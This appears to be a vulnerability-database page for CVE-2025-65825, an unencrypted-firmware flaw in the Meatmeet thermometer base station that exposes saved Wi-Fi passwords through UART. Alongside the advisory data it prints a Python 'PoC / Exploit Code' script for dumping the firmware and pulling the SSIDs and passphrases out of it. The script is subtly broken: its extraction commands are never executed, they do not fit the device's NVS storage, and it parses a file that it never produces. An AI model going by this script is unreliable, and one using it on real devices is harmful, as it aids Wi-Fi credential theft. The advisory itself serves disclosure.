Security Vulnerability Report
中文
CVE-2025-65825 CVSS 4.6 MEDIUM

CVE-2025-65825

Published: 2025-12-10 21:16:08
Last Modified: 2025-12-30 19:15:40
Source: [email protected]

Description

The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Meatmeet基站固件(固件加密功能未启用)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65825 PoC - Meatmeet固件提取与Wi-Fi凭据获取 # Hardware Required: USB to TTL Serial Adapter, Jumper Wires # Software Required: minicom/putty, esptool, NVS partition parser import subprocess import re def connect_uart(): """Connect to device UART interface""" # UART connection parameters for Meatmeet device port = '/dev/ttyUSB0' # Adjust to your serial port baudrate = 115200 print(f'[*] Connecting to UART on {port} at {baudrate} baud') # Example: minicom -D /dev/ttyUSB0 -b 115200 return True def extract_firmware(): """Extract firmware dump via UART debug interface""" print('[*] Attempting to dump firmware via UART...') # Step 1: Access bootloader commands = [ 'cat /dev/mtd0', # Read full MTD0 partition (bootloader + firmware) 'dd if=/dev/mtdblock0 of=/tmp/firmware.bin', # Alternative method 'cat /dev/mtdblock1 > /tmp/nvs.bin' # Extract NVS partition specifically ] # Execute via serial connection print('[*] Firmware extraction commands ready') return '/tmp/firmware.bin' def parse_nvs_partition(firmware_path): """Parse NVS partition to extract Wi-Fi credentials""" print(f'[*] Parsing NVS partition from {firmware_path}') nvs_data = open(firmware_path, 'rb').read() # NVS key-value structure parsing wifi_creds = [] # Search for Wi-Fi related patterns ssid_pattern = rb'SSID.*?(.{1,32})' psk_pattern = rb'PSK.*?(.{8,63})' # Extract current Wi-Fi credentials current_ssid = re.findall(ssid_pattern, nvs_data) current_psk = re.findall(psk_pattern, nvs_data) if current_ssid and current_psk: wifi_creds.append({ 'type': 'current', 'ssid': current_ssid[0].decode('utf-8', errors='ignore'), 'psk': current_psk[0].decode('utf-8', errors='ignore') }) # Extract historical Wi-Fi credentials (stored in NVS namespace) print('[*] Searching for historical Wi-Fi credentials...') # Historical networks typically stored with namespace prefix return wifi_creds def main(): print('='*60) print('CVE-2025-65825 PoC - Meatmeet Firmware Extraction') print('='*60) # Step 1: Physical access - connect UART if connect_uart(): print('[+] UART connection established') # Step 2: Extract firmware firmware_path = extract_firmware() print(f'[+] Firmware extracted to {firmware_path}') # Step 3: Parse NVS for Wi-Fi credentials credentials = parse_nvs_partition(firmware_path) for cred in credentials: print(f"[+] Found Wi-Fi: SSID={cred['ssid']}, PSK={cred['psk']}") print('[*] Attack completed - credentials extracted') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65825", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.250", "lastModified": "2025-12-30T19:15:39.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-flash-encryption-disabled-md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Flash-Encryption-Disabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.